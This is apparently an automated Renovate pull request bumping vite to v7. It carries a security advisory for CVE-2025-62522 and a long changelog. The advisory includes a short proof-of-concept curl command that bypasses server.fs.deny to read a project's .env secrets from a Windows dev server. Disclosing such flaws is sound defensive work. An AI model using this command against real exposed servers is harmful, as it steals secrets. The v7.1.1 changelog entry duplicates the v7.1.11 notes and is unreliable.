<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xNDMuMSIsInVwZGF0ZWRJblZlciI6IjQxLjE1Ni4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
2c44d3abc6 |
chore: bump up vite version to v7 [SECURITY] (#13786)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [vite](https://vite.dev) ([source](https://redirect.github.com/vitejs/vite/tree/HEAD/packages/vite)) | [`^6.1.0` -> `^7.0.0`](https://renovatebot.com/diffs/npm/vite/6.3.6/7.1.11) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [vite](https://vite.dev) ([source](https://redirect.github.com/vitejs/vite/tree/HEAD/packages/vite)) | [`^6.0.3` -> `^7.0.0`](https://renovatebot.com/diffs/npm/vite/6.3.6/7.1.11) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | ### GitHub Vulnerability Alerts #### [CVE-2025-62522](https://redirect.github.com/vitejs/vite/security/advisories/GHSA-93m4-6634-74q7) ### Summary Files denied by [`server.fs.deny`](https://vitejs.dev/config/server-options.html#server-fs-deny) were sent if the URL ended with `\` when the dev server is running on Windows. ### Impact Only apps that match the following conditions are affected: - explicitly exposes the Vite dev server to the network (using --host or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host)) - running the dev server on Windows ### Details `server.fs.deny` can contain patterns matching against files (by default it includes `.env`, `.env.*`, `*.{crt,pem}` as such patterns). These patterns were able to bypass by using a back slash(`\`). The root cause is that `fs.readFile('/foo.png/')` loads `/foo.png`. ### PoC ```shell npm create vite@latest cd vite-project/ cat "secret" > .env npm install npm run dev curl --request-target /.env\ http://localhost:5173 ``` <img width="1593" height="616" alt="image" src="https://github.com/user-attachments/assets/36212f4e-1d3c-4686-b16f-16b35ca9e175" /> --- ### Release Notes <details> <summary>vitejs/vite (vite)</summary> ### [`v7.1.11`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-7111-2025-10-20-small) [Compare Source](https://redirect.github.com/vitejs/vite/compare/v7.1.10...v7.1.11) ##### Bug Fixes - **dev:** trim trailing slash before `server.fs.deny` check ([#​20968](https://redirect.github.com/vitejs/vite/issues/20968)) ([f479cc5](https://redirect.github.com/vitejs/vite/commit/f479cc57c425ed41ceb434fecebd63931b1ed4ed)) ##### Miscellaneous Chores - **deps:** update all non-major dependencies ([#​20966](https://redirect.github.com/vitejs/vite/issues/20966)) ([6fb41a2](https://redirect.github.com/vitejs/vite/commit/6fb41a260bda443685e719ea4765d3faca3db944)) ##### Code Refactoring - use subpath imports for types module reference ([#​20921](https://redirect.github.com/vitejs/vite/issues/20921)) ([d0094af](https://redirect.github.com/vitejs/vite/commit/d0094af639d9ebbb51d4e00910b74f23eb8fe131)) ##### Build System - remove cjs reference in files field ([#​20945](https://redirect.github.com/vitejs/vite/issues/20945)) ([ef411ce](https://redirect.github.com/vitejs/vite/commit/ef411cee2696af3ba791879fdae9aad165f178b2)) - remove hash from built filenames ([#​20946](https://redirect.github.com/vitejs/vite/issues/20946)) ([a817307](https://redirect.github.com/vitejs/vite/commit/a81730754d655d1371ce0f4354af1c84e12f9f2d)) ### [`v7.1.10`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-7110-2025-10-14-small) [Compare Source](https://redirect.github.com/vitejs/vite/compare/v7.1.9...v7.1.10) ##### Bug Fixes - **css:** avoid duplicate style for server rendered stylesheet link and client inline style during dev ([#​20767](https://redirect.github.com/vitejs/vite/issues/20767)) ([3a92bc7](https://redirect.github.com/vitejs/vite/commit/3a92bc79b306a01b8aaf37f80b2239eaf6e488e7)) - **css:** respect emitAssets when cssCodeSplit=false ([#​20883](https://redirect.github.com/vitejs/vite/issues/20883)) ([d3e7eee](https://redirect.github.com/vitejs/vite/commit/d3e7eeefa91e1992f47694d16fe4dbe708c4d80e)) - **deps:** update all non-major dependencies ([879de86](https://redirect.github.com/vitejs/vite/commit/879de86935a31b4e47ab907ddd859366518ce268)) - **deps:** update all non-major dependencies ([#​20894](https://redirect.github.com/vitejs/vite/issues/20894)) ([3213f90](https://redirect.github.com/vitejs/vite/commit/3213f90ff0d8f274bcec65f40aac6dfcff1ac244)) - **dev:** allow aliases starting with `//` ([#​20760](https://redirect.github.com/vitejs/vite/issues/20760)) ([b95fa2a](https://redirect.github.com/vitejs/vite/commit/b95fa2aa7564eda4c9f05ee7616a2dbada35e463)) - **dev:** remove timestamp query consistently ([#​20887](https://redirect.github.com/vitejs/vite/issues/20887)) ([6537d15](https://redirect.github.com/vitejs/vite/commit/6537d15591619d7e1cfc1e50599bec16cd88340f)) - **esbuild:** inject esbuild helpers correctly for esbuild 0.25.9+ ([#​20906](https://redirect.github.com/vitejs/vite/issues/20906)) ([446eb38](https://redirect.github.com/vitejs/vite/commit/446eb386329ef682d614c77958a542f2dc222880)) - normalize path before calling `fileToBuiltUrl` ([#​20898](https://redirect.github.com/vitejs/vite/issues/20898)) ([73b6d24](https://redirect.github.com/vitejs/vite/commit/73b6d243e0398ee5d8d44c7d24162f4a0f4b1cf1)) - preserve original sourcemap file field when combining sourcemaps ([#​20926](https://redirect.github.com/vitejs/vite/issues/20926)) ([c714776](https://redirect.github.com/vitejs/vite/commit/c714776aa1dcc24299a81c1495cbcbb1b1ef1dd3)) ##### Documentation - correct `WebSocket` spelling ([#​20890](https://redirect.github.com/vitejs/vite/issues/20890)) ([29e98dc](https://redirect.github.com/vitejs/vite/commit/29e98dc3efe35efbd978523367c05db7d2e7a278)) ##### Miscellaneous Chores - **deps:** update rolldown-related dependencies ([#​20923](https://redirect.github.com/vitejs/vite/issues/20923)) ([a5e3b06](https://redirect.github.com/vitejs/vite/commit/a5e3b064fa7ca981cb6f15f8e88806b36a99b8bf)) ### [`v7.1.9`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-719-2025-10-03-small) [Compare Source](https://redirect.github.com/vitejs/vite/compare/v7.1.8...v7.1.9) ##### Reverts - **server:** drain stdin when not interactive ([#​20885](https://redirect.github.com/vitejs/vite/issues/20885)) ([12d72b0](https://redirect.github.com/vitejs/vite/commit/12d72b0538ef1540bfb0f1dd8a44b75deaa3464e)) ### [`v7.1.8`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-718-2025-10-02-small) [Compare Source](https://redirect.github.com/vitejs/vite/compare/v7.1.7...v7.1.8) ##### Bug Fixes - **css:** improve url escape characters handling ([#​20847](https://redirect.github.com/vitejs/vite/issues/20847)) ([24a61a3](https://redirect.github.com/vitejs/vite/commit/24a61a3f5404279e91f7ceebf7449a5e874f9d56)) - **deps:** update all non-major dependencies ([#​20855](https://redirect.github.com/vitejs/vite/issues/20855)) ([788a183](https://redirect.github.com/vitejs/vite/commit/788a183afce57de13f5656f0cf42cdf6fdc3ebaa)) - **deps:** update artichokie to 0.4.2 ([#​20864](https://redirect.github.com/vitejs/vite/issues/20864)) ([e670799](https://redirect.github.com/vitejs/vite/commit/e670799e123dca78e1a63aeb06dbadade3d5ab51)) - **dev:** skip JS responses for document requests ([#​20866](https://redirect.github.com/vitejs/vite/issues/20866)) ([6bc6c4d](https://redirect.github.com/vitejs/vite/commit/6bc6c4dbc23501577d3919dc841454eb2eb14a54)) - **glob:** fix HMR for array patterns with exclusions ([#​20872](https://redirect.github.com/vitejs/vite/issues/20872)) ([63e040f](https://redirect.github.com/vitejs/vite/commit/63e040f1ca6b635a007eb40aa7c8b891e8cc5799)) - keep ids for virtual modules as-is ([#​20808](https://redirect.github.com/vitejs/vite/issues/20808)) ([d4eca98](https://redirect.github.com/vitejs/vite/commit/d4eca986d679c77bd449db20fd99d8255985b550)) - **server:** drain stdin when not interactive ([#​20837](https://redirect.github.com/vitejs/vite/issues/20837)) ([bb950e9](https://redirect.github.com/vitejs/vite/commit/bb950e92b372f9a52245e9542cf9d9700d23ef8c)) - **server:** improve malformed URL handling in middlewares ([#​20830](https://redirect.github.com/vitejs/vite/issues/20830)) ([d65a983](https://redirect.github.com/vitejs/vite/commit/d65a9831c984e562c5bf2b5f427de16f6e1bd931)) ##### Documentation - **create-vite:** provide deno example ([#​20747](https://redirect.github.com/vitejs/vite/issues/20747)) ([fdb758a](https://redirect.github.com/vitejs/vite/commit/fdb758a51796b1ab605437b2eee778a84e87e169)) ##### Miscellaneous Chores - **deps:** update rolldown-related dependencies ([#​20810](https://redirect.github.com/vitejs/vite/issues/20810)) ([ea68a88](https://redirect.github.com/vitejs/vite/commit/ea68a8868c7ee249213057f8a81c3f92a9839dde)) - **deps:** update rolldown-related dependencies ([#​20854](https://redirect.github.com/vitejs/vite/issues/20854)) ([4dd06fd](https://redirect.github.com/vitejs/vite/commit/4dd06fdc8d643059c2abf88188eae7c4877aab6e)) - update url of `create-react-app` license ([#​20865](https://redirect.github.com/vitejs/vite/issues/20865)) ([166a178](https://redirect.github.com/vitejs/vite/commit/166a178f45b6e48db27b5626559f5ec3358c2fb4)) ### [`v7.1.7`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-717-2025-09-22-small) [Compare Source](https://redirect.github.com/vitejs/vite/compare/v7.1.6...v7.1.7) ##### Bug Fixes - **build:** fix ssr environment `emitAssets: true` when `sharedConfigBuild: true` ([#​20787](https://redirect.github.com/vitejs/vite/issues/20787)) ([4c4583c](https://redirect.github.com/vitejs/vite/commit/4c4583ce7a13306e0853901570c5d95517fe81da)) - **client:** use CSP nonce when rendering error overlay ([#​20791](https://redirect.github.com/vitejs/vite/issues/20791)) ([9bc9d12](https://redirect.github.com/vitejs/vite/commit/9bc9d1258f550e9d8f5e530cd27aecb1bee32bdb)) - **deps:** update all non-major dependencies ([#​20811](https://redirect.github.com/vitejs/vite/issues/20811)) ([9f2247c](https://redirect.github.com/vitejs/vite/commit/9f2247c066cac75746356c9391845235445a154b)) - **glob:** handle glob imports from folders starting with dot ([#​20800](https://redirect.github.com/vitejs/vite/issues/20800)) ([105abe8](https://redirect.github.com/vitejs/vite/commit/105abe87c412cf0f83859ba41fed869221cbb3e0)) - **hmr:** trigger prune event when import is removed from non hmr module ([#​20768](https://redirect.github.com/vitejs/vite/issues/20768)) ([9f32b1d](https://redirect.github.com/vitejs/vite/commit/9f32b1dc710991c53a9f665c8d0d6945f342bf92)) - **hmr:** wait for `import.meta.hot.prune` callbacks to complete before running other HMRs ([#​20698](https://redirect.github.com/vitejs/vite/issues/20698)) ([98a3484](https://redirect.github.com/vitejs/vite/commit/98a3484733443ee529870477a6ab6a03572e3cbc)) ### [`v7.1.6`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-716-2025-09-18-small) [Compare Source](https://redirect.github.com/vitejs/vite/compare/v7.1.5...v7.1.6) ##### Bug Fixes - **deps:** update all non-major dependencies ([#​20773](https://redirect.github.com/vitejs/vite/issues/20773)) ([88af2ae](https://redirect.github.com/vitejs/vite/commit/88af2ae7df77160e7d11a9fa147a4967c8499f13)) - **esbuild:** inject esbuild helper functions with minified `$` variables correctly ([#​20761](https://redirect.github.com/vitejs/vite/issues/20761)) ([7e8e004](https://redirect.github.com/vitejs/vite/commit/7e8e0043d60379e11da481d9cc3c3556c9756ac0)) - fallback terser to main thread when nameCache is provided ([#​20750](https://redirect.github.com/vitejs/vite/issues/20750)) ([a679a64](https://redirect.github.com/vitejs/vite/commit/a679a643404c95556dda2670643e14eca9c585bd)) - **types:** strict env typings fail when `skipLibCheck` is `false` ([#​20755](https://redirect.github.com/vitejs/vite/issues/20755)) ([cc54e29](https://redirect.github.com/vitejs/vite/commit/cc54e294746d3eac868de96f85d98dd0fa0cda11)) ##### Miscellaneous Chores - **deps:** update rolldown-related dependencies ([#​20675](https://redirect.github.com/vitejs/vite/issues/20675)) ([a67bb5f](https://redirect.github.com/vitejs/vite/commit/a67bb5fbec5f3e42151dc7e3166858d0d33533de)) - **deps:** update rolldown-related dependencies ([#​20772](https://redirect.github.com/vitejs/vite/issues/20772)) ([d785e72](https://redirect.github.com/vitejs/vite/commit/d785e72f2ead705e8b2416c0a5097878fced3435)) ### [`v7.1.5`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-715-2025-09-08-small) [Compare Source](https://redirect.github.com/vitejs/vite/compare/v7.1.4...v7.1.5) ##### Bug Fixes - apply `fs.strict` check to HTML files ([#​20736](https://redirect.github.com/vitejs/vite/issues/20736)) ([14015d7](https://redirect.github.com/vitejs/vite/commit/14015d794f69accba68798bd0e15135bc51c9c1e)) - **deps:** update all non-major dependencies ([#​20732](https://redirect.github.com/vitejs/vite/issues/20732)) ([122bfba](https://redirect.github.com/vitejs/vite/commit/122bfbabeb1f095ce7cabd30893e5531e9a007c4)) - upgrade sirv to 3.0.2 ([#​20735](https://redirect.github.com/vitejs/vite/issues/20735)) ([09f2b52](https://redirect.github.com/vitejs/vite/commit/09f2b52e8d5907f26602653caf41b3a56692600d)) ### [`v7.1.4`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-714-2025-09-01-small) [Compare Source](https://redirect.github.com/vitejs/vite/compare/v7.1.3...v7.1.4) ##### Bug Fixes - add missing awaits ([#​20697](https://redirect.github.com/vitejs/vite/issues/20697)) ([79d10ed](https://redirect.github.com/vitejs/vite/commit/79d10ed6341ba7a751d007b7ad113a9b8be9c853)) - **deps:** update all non-major dependencies ([#​20676](https://redirect.github.com/vitejs/vite/issues/20676)) ([5a274b2](https://redirect.github.com/vitejs/vite/commit/5a274b29df83744cf0ce4dafd94029d2a9e01135)) - **deps:** update all non-major dependencies ([#​20709](https://redirect.github.com/vitejs/vite/issues/20709)) ([0401feb](https://redirect.github.com/vitejs/vite/commit/0401feba17e60bd7e976c5643128a0da49670a83)) - pass rollup watch options when building in watch mode ([#​20674](https://redirect.github.com/vitejs/vite/issues/20674)) ([f367453](https://redirect.github.com/vitejs/vite/commit/f367453ca2825bc8a390d41c5d13b161756f2b41)) ##### Miscellaneous Chores - remove unused constants entry from rolldown.config.ts ([#​20710](https://redirect.github.com/vitejs/vite/issues/20710)) ([537fcf9](https://redirect.github.com/vitejs/vite/commit/537fcf91862a1bf51e70ce6fe9b414319dd3a675)) ##### Code Refactoring - remove unnecessary `minify` parameter from `finalizeCss` ([#​20701](https://redirect.github.com/vitejs/vite/issues/20701)) ([8099582](https://redirect.github.com/vitejs/vite/commit/8099582e5364f907f2bc6cb8e2d52ae0c4d937e4)) ### [`v7.1.3`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-713-2025-08-19-small) [Compare Source](https://redirect.github.com/vitejs/vite/compare/v7.1.2...v7.1.3) ##### Features - **cli:** add Node.js version warning for unsupported versions ([#​20638](https://redirect.github.com/vitejs/vite/issues/20638)) ([a1be1bf](https://redirect.github.com/vitejs/vite/commit/a1be1bf0905b9086e5f1370c63d76a7fa4a195ec)) - generate code frame for parse errors thrown by terser ([#​20642](https://redirect.github.com/vitejs/vite/issues/20642)) ([a9ba017](https://redirect.github.com/vitejs/vite/commit/a9ba0174a58b949373d6b4240bc69180dff0b780)) - support long lines in `generateCodeFrame` ([#​20640](https://redirect.github.com/vitejs/vite/issues/20640)) ([1559577](https://redirect.github.com/vitejs/vite/commit/15595773170c2a07f2efdccee05964fb87c19ae6)) ##### Bug Fixes - **deps:** update all non-major dependencies ([#​20634](https://redirect.github.com/vitejs/vite/issues/20634)) ([4851cab](https://redirect.github.com/vitejs/vite/commit/4851cab3ba818b5f0f82eef3796b61d4b12768f1)) - **optimizer:** incorrect incompatible error ([#​20439](https://redirect.github.com/vitejs/vite/issues/20439)) ([446fe83](https://redirect.github.com/vitejs/vite/commit/446fe83033686dd38d13b786a217b8277b5c5f09)) - support multiline new URL(..., import.meta.url) expressions ([#​20644](https://redirect.github.com/vitejs/vite/issues/20644)) ([9ccf142](https://redirect.github.com/vitejs/vite/commit/9ccf142764d48292aa33e5ca6f020a7d55b97f61)) ##### Performance Improvements - **cli:** dynamically import `resolveConfig` ([#​20646](https://redirect.github.com/vitejs/vite/issues/20646)) ([f691f57](https://redirect.github.com/vitejs/vite/commit/f691f57e46118328e00174160ceab2101b7256ca)) ##### Miscellaneous Chores - **deps:** update rolldown-related dependencies ([#​20633](https://redirect.github.com/vitejs/vite/issues/20633)) ([98b92e8](https://redirect.github.com/vitejs/vite/commit/98b92e8c4b10ae87c48292a8ac09b01ca81a02cf)) ##### Code Refactoring - replace startsWith with strict equality ([#​20603](https://redirect.github.com/vitejs/vite/issues/20603)) ([42816de](https://redirect.github.com/vitejs/vite/commit/42816dee0e177dded1c9de4d9099089ec4acef96)) - use `import` in worker threads ([#​20641](https://redirect.github.com/vitejs/vite/issues/20641)) ([530687a](https://redirect.github.com/vitejs/vite/commit/530687a344c51daf3115d1c134586bbde58356e0)) ##### Tests - remove `checkNodeVersion` test ([#​20647](https://redirect.github.com/vitejs/vite/issues/20647)) ([731d3e6](https://redirect.github.com/vitejs/vite/commit/731d3e61f444f6c5e611f67b531416ed6450f90f)) ### [`v7.1.2`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-712-2025-08-12-small) [Compare Source](https://redirect.github.com/vitejs/vite/compare/v7.1.1...v7.1.2) ##### Bug Fixes - **client:** add `[vite]` prefixes to debug logs ([#​20595](https://redirect.github.com/vitejs/vite/issues/20595)) ([7cdef61](https://redirect.github.com/vitejs/vite/commit/7cdef612a65da5363905723f77516b6745ac9a94)) - **config:** make debugger work with bundle loader ([#​20573](https://redirect.github.com/vitejs/vite/issues/20573)) ([c583927](https://redirect.github.com/vitejs/vite/commit/c583927bee657f15f63fdf80468fbe6a74eacdec)) - **deps:** update all non-major dependencies ([#​20587](https://redirect.github.com/vitejs/vite/issues/20587)) ([20d4817](https://redirect.github.com/vitejs/vite/commit/20d48172a0352d32f766b3c878d52a8944fdbf6e)) - don't consider ids with `npm:` prefix as a built-in module ([#​20558](https://redirect.github.com/vitejs/vite/issues/20558)) ([ab33803](https://redirect.github.com/vitejs/vite/commit/ab33803f2c831a82ddee637ad62e0c4ceeb663f1)) - **hmr:** watch non-inlined assets referenced by CSS ([#​20581](https://redirect.github.com/vitejs/vite/issues/20581)) ([b7d494b](https://redirect.github.com/vitejs/vite/commit/b7d494bf60af3ef7316d87266bb3ebf56617d5fd)) - **module-runner:** prevent crash when sourceMappingURL pattern appears in string literals ([#​20554](https://redirect.github.com/vitejs/vite/issues/20554)) ([2770478](https://redirect.github.com/vitejs/vite/commit/2770478d1c190d3e3de34ef9a3d2c493c06e9933)) ##### Miscellaneous Chores - **deps:** migrate to `@jridgewell/remapping` from `@ampproject/remapping` ([#​20577](https://redirect.github.com/vitejs/vite/issues/20577)) ([0a6048a](https://redirect.github.com/vitejs/vite/commit/0a6048aba4523f451edf29ae4037d252cc963815)) - **deps:** update rolldown-related dependencies ([#​20586](https://redirect.github.com/vitejs/vite/issues/20586)) ([77632c5](https://redirect.github.com/vitejs/vite/commit/77632c55db51cd6d03bcf24a1cef8d21058100a3)) ### [`v7.1.1`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-7111-2025-10-20-small) [Compare Source](https://redirect.github.com/vitejs/vite/compare/v7.1.0...v7.1.1) ##### Bug Fixes - **dev:** trim trailing slash before `server.fs.deny` check ([#​20968](https://redirect.github.com/vitejs/vite/issues/20968)) ([f479cc5](https://redirect.github.com/vitejs/vite/commit/f479cc57c425ed41ceb434fecebd63931b1ed4ed)) ##### Miscellaneous Chores - **deps:** update all non-major dependencies ([#​20966](https://redirect.github.com/vitejs/vite/issues/20966)) ([6fb41a2](https://redirect.github.com/vitejs/vite/commit/6fb41a260bda443685e719ea4765d3faca3db944)) ##### Code Refactoring - use subpath imports for types module reference ([#​20921](https://redirect.github.com/vitejs/vite/issues/20921)) ([d0094af](https://redirect.github.com/vitejs/vite/commit/d0094af639d9ebbb51d4e00910b74f23eb8fe131)) ##### Build System - remove cjs reference in files field ([#​20945](https://redirect.github.com/vitejs/vite/issues/20945)) ([ef411ce](https://redirect.github.com/vitejs/vite/commit/ef411cee2696af3ba791879fdae9aad165f178b2)) - remove hash from built filenames ([#​20946](https://redirect.github.com/vitejs/vite/issues/20946)) ([a817307](https://redirect.github.com/vitejs/vite/commit/a81730754d655d1371ce0f4354af1c84e12f9f2d)) ### [`v7.1.0`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#710-2025-08-07) [Compare Source](https://redirect.github.com/vitejs/vite/compare/v7.0.8...v7.1.0) ##### Features - support files with more than 1000 lines by `generateCodeFrame` ([#​20508](https://redirect.github.com/vitejs/vite/issues/20508)) ([e7d0b2a](https://redirect.github.com/vitejs/vite/commit/e7d0b2afa56840dabbbad10015dc04083caaf248)) - add `import.meta.main` support in config (bundle config loader) ([#​20516](https://redirect.github.com/vitejs/vite/issues/20516)) ([5d3e3c2](https://redirect.github.com/vitejs/vite/commit/5d3e3c2ae5a2174941fd09fd7842794a287c3ab7)) - **optimizer:** improve dependency optimization error messages with esbuild formatMessages ([#​20525](https://redirect.github.com/vitejs/vite/issues/20525)) ([d17cfed](https://redirect.github.com/vitejs/vite/commit/d17cfeda0741e4476570700a00b7b37917c97700)) - **ssr:** add `import.meta.main` support for Node.js module runner ([#​20517](https://redirect.github.com/vitejs/vite/issues/20517)) ([794a8f2](https://redirect.github.com/vitejs/vite/commit/794a8f230218a3b1e148defc5a2d7a67409177ff)) - add `future: 'warn'` ([#​20473](https://redirect.github.com/vitejs/vite/issues/20473)) ([e6aaf17](https://redirect.github.com/vitejs/vite/commit/e6aaf17ca21544572941957ce71bd8dbdc94e402)) - add `removeServerPluginContainer` future deprecation ([#​20437](https://redirect.github.com/vitejs/vite/issues/20437)) ([c1279e7](https://redirect.github.com/vitejs/vite/commit/c1279e75401ac6ea1d0678da88414a76ff36b6fe)) - add `removeServerReloadModule` future deprecation ([#​20436](https://redirect.github.com/vitejs/vite/issues/20436)) ([6970d17](https://redirect.github.com/vitejs/vite/commit/6970d1740cebd56af696abf60f30adb0c060f578)) - add `server.warmupRequest` to future deprecation ([#​20431](https://redirect.github.com/vitejs/vite/issues/20431)) ([8ad388a](https://redirect.github.com/vitejs/vite/commit/8ad388aeab0dc79e4bc14859b91174427805a46b)) - add `ssrFixStacktrace` / `ssrRewriteStacktrace` to `removeSsrLoadModule` future deprecation ([#​20435](https://redirect.github.com/vitejs/vite/issues/20435)) ([8c8f587](https://redirect.github.com/vitejs/vite/commit/8c8f5879ead251705c2c363f5b8b94f618fbf374)) - **client:** ping from SharedWorker ([#​19057](https://redirect.github.com/vitejs/vite/issues/19057)) ([5c97c22](https://redirect.github.com/vitejs/vite/commit/5c97c22548476e5f80856ece1d80b9234a7e6ecb)) - **dev:** add `this.fs` support ([#​20301](https://redirect.github.com/vitejs/vite/issues/20301)) ([0fe3f2f](https://redirect.github.com/vitejs/vite/commit/0fe3f2f7c325c5990f1059c28b66b24e1b8fd5d3)) - export `defaultExternalConditions` ([#​20279](https://redirect.github.com/vitejs/vite/issues/20279)) ([344d302](https://redirect.github.com/vitejs/vite/commit/344d30243b107852b133175e947a0410ea703f00)) - implement `removePluginHookSsrArgument` future deprecation ([#​20433](https://redirect.github.com/vitejs/vite/issues/20433)) ([95927d9](https://redirect.github.com/vitejs/vite/commit/95927d9c0ba1cb0b3bd8c900f039c099f8e29f90)) - implement `removeServerHot` future deprecation ([#​20434](https://redirect.github.com/vitejs/vite/issues/20434)) ([259f45d](https://redirect.github.com/vitejs/vite/commit/259f45d0698a184d6ecc352b610001fa1acdcee1)) - resolve server URLs before calling other listeners ([#​19981](https://redirect.github.com/vitejs/vite/issues/19981)) ([45f6443](https://redirect.github.com/vitejs/vite/commit/45f6443a935258d8eee62874f0695b8c1c60a481)) - **ssr:** resolve externalized packages with `resolve.externalConditions` and add `module-sync` to default external condition ([#​20409](https://redirect.github.com/vitejs/vite/issues/20409)) ([c669c52](https://redirect.github.com/vitejs/vite/commit/c669c524e6008a4902169f4b2f865e892297acf3)) - **ssr:** support `import.meta.resolve` in module runner ([#​20260](https://redirect.github.com/vitejs/vite/issues/20260)) ([62835f7](https://redirect.github.com/vitejs/vite/commit/62835f7c06d37802f0bc2abbf58bbaeaa8c73ce5)) ##### Bug Fixes - **css:** avoid warnings for `image-set` containing `__VITE_ASSET__` ([#​20520](https://redirect.github.com/vitejs/vite/issues/20520)) ([f1a2635](https://redirect.github.com/vitejs/vite/commit/f1a2635e6977a3eda681bec036f64f07686dad0d)) - **css:** empty CSS entry points should generate CSS files, not JS files ([#​20518](https://redirect.github.com/vitejs/vite/issues/20518)) ([bac9f3e](https://redirect.github.com/vitejs/vite/commit/bac9f3ecf84ae5c5add6ef224ae057508247f89e)) - **dev:** denied request stalled when requested concurrently ([#​20503](https://redirect.github.com/vitejs/vite/issues/20503)) ([64a52e7](https://redirect.github.com/vitejs/vite/commit/64a52e70d9250b16aa81ce2df27c23fe56907257)) - **manifest:** initialize `entryCssAssetFileNames` as an empty Set ([#​20542](https://redirect.github.com/vitejs/vite/issues/20542)) ([6a46cda](https://redirect.github.com/vitejs/vite/commit/6a46cdac5dece70296d1179640958deeeb2e6c19)) - skip prepareOutDirPlugin in workers ([#​20556](https://redirect.github.com/vitejs/vite/issues/20556)) ([97d5111](https://redirect.github.com/vitejs/vite/commit/97d5111645a395dae48b16b110bc76c1ee8956c8)) - **asset:** only watch existing files for `new URL(, import.meta.url)` ([#​20507](https://redirect.github.com/vitejs/vite/issues/20507)) ([1b211fd](https://redirect.github.com/vitejs/vite/commit/1b211fd1beccd0fc13bec700815abaa9f54147e8)) - **client:** keep ping on WS constructor error ([#​20512](https://redirect.github.com/vitejs/vite/issues/20512)) ([3676da5](https://redirect.github.com/vitejs/vite/commit/3676da5bc5b2b69b28619b8521fca94d30468fe5)) - **deps:** update all non-major dependencies ([#​20537](https://redirect.github.com/vitejs/vite/issues/20537)) ([fc9a9d3](https://redirect.github.com/vitejs/vite/commit/fc9a9d3f1493caa3d614f64e0a61fd5684f0928b)) - don't resolve as relative for specifiers starting with a dot ([#​20528](https://redirect.github.com/vitejs/vite/issues/20528)) ([c5a10ec](https://redirect.github.com/vitejs/vite/commit/c5a10ec004130bec17cf42760b76d1d404008fa3)) - **html:** allow control character in input stream ([#​20483](https://redirect.github.com/vitejs/vite/issues/20483)) ([c12a4a7](https://redirect.github.com/vitejs/vite/commit/c12a4a76a299237a0a13b885c72fdda6e4a3c9b7)) - merge old and new `noExternal: true` correctly ([#​20502](https://redirect.github.com/vitejs/vite/issues/20502)) ([9ebe4a5](https://redirect.github.com/vitejs/vite/commit/9ebe4a514a2e48e3fe194f16b0556a45ff38077a)) - **deps:** update all non-major dependencies ([#​20489](https://redirect.github.com/vitejs/vite/issues/20489)) ([f6aa04a](https://redirect.github.com/vitejs/vite/commit/f6aa04a52d486c8881f666c450caa3dab3c6bba1)) - **dev:** denied requests overly ([#​20410](https://redirect.github.com/vitejs/vite/issues/20410)) ([4be5270](https://redirect.github.com/vitejs/vite/commit/4be5270b27f7e6323f1771974b4b3520d86600e4)) - **hmr:** register css deps as `type: asset` ([#​20391](https://redirect.github.com/vitejs/vite/issues/20391)) ([7eac8dd](https://redirect.github.com/vitejs/vite/commit/7eac8ddb65033b8c001d6c6bc46aaeeefb79680a)) - **optimizer:** discover correct jsx runtime during scan ([#​20495](https://redirect.github.com/vitejs/vite/issues/20495)) ([10d48bb](https://redirect.github.com/vitejs/vite/commit/10d48bb2e30824d217e415a58cea9e69c2820c2a)) - **preview:** set correct host for `resolvedUrls` ([#​20496](https://redirect.github.com/vitejs/vite/issues/20496)) ([62b3e0d](https://redirect.github.com/vitejs/vite/commit/62b3e0d95c143e2f8b4e88d99c381d23663025ee)) - **worker:** resolve WebKit compat with inline workers by deferring blob URL revocation ([#​20460](https://redirect.github.com/vitejs/vite/issues/20460)) ([8033e5b](https://redirect.github.com/vitejs/vite/commit/8033e5bf8d3ff43995d0620490ed8739c59171dd)) ##### Performance Improvements - **client:** reduce reload debounce ([#​20429](https://redirect.github.com/vitejs/vite/issues/20429)) ([22ad43b](https://redirect.github.com/vitejs/vite/commit/22ad43b4bf2435efe78a65b84e8469b23521900a)) ##### Miscellaneous Chores - **deps:** update rolldown-related dependencies ([#​20536](https://redirect.github.com/vitejs/vite/issues/20536)) ([8be2787](https://redirect.github.com/vitejs/vite/commit/8be278748a92b128c49a24619d8d537dd2b08ceb)) - **deps:** update dependency parse5 to v8 ([#​20490](https://redirect.github.com/vitejs/vite/issues/20490)) ([744582d](https://redirect.github.com/vitejs/vite/commit/744582d0187c50045fb6cf229e3fab13093af08e)) - format ([f20addc](https://redirect.github.com/vitejs/vite/commit/f20addc5363058f5fd797e5bc71fab3877ed0a76)) - stablize `cssScopeTo` ([#​19592](https://redirect.github.com/vitejs/vite/issues/19592)) ([ced1343](https://redirect.github.com/vitejs/vite/commit/ced13433fb71e2101850a4da1b0ef70cbc38b804)) ##### Code Refactoring - use hook filters in the worker plugin ([#​20527](https://redirect.github.com/vitejs/vite/issues/20527)) ([958cdf2](https://redirect.github.com/vitejs/vite/commit/958cdf24f882be6953ca20912dd30c84213b069b)) - extract prepareOutDir as a plugin ([#​20373](https://redirect.github.com/vitejs/vite/issues/20373)) ([2c4af1f](https://redirect.github.com/vitejs/vite/commit/2c4af1f90b3ac98df6f4585a329528e6bd850462)) - extract resolve 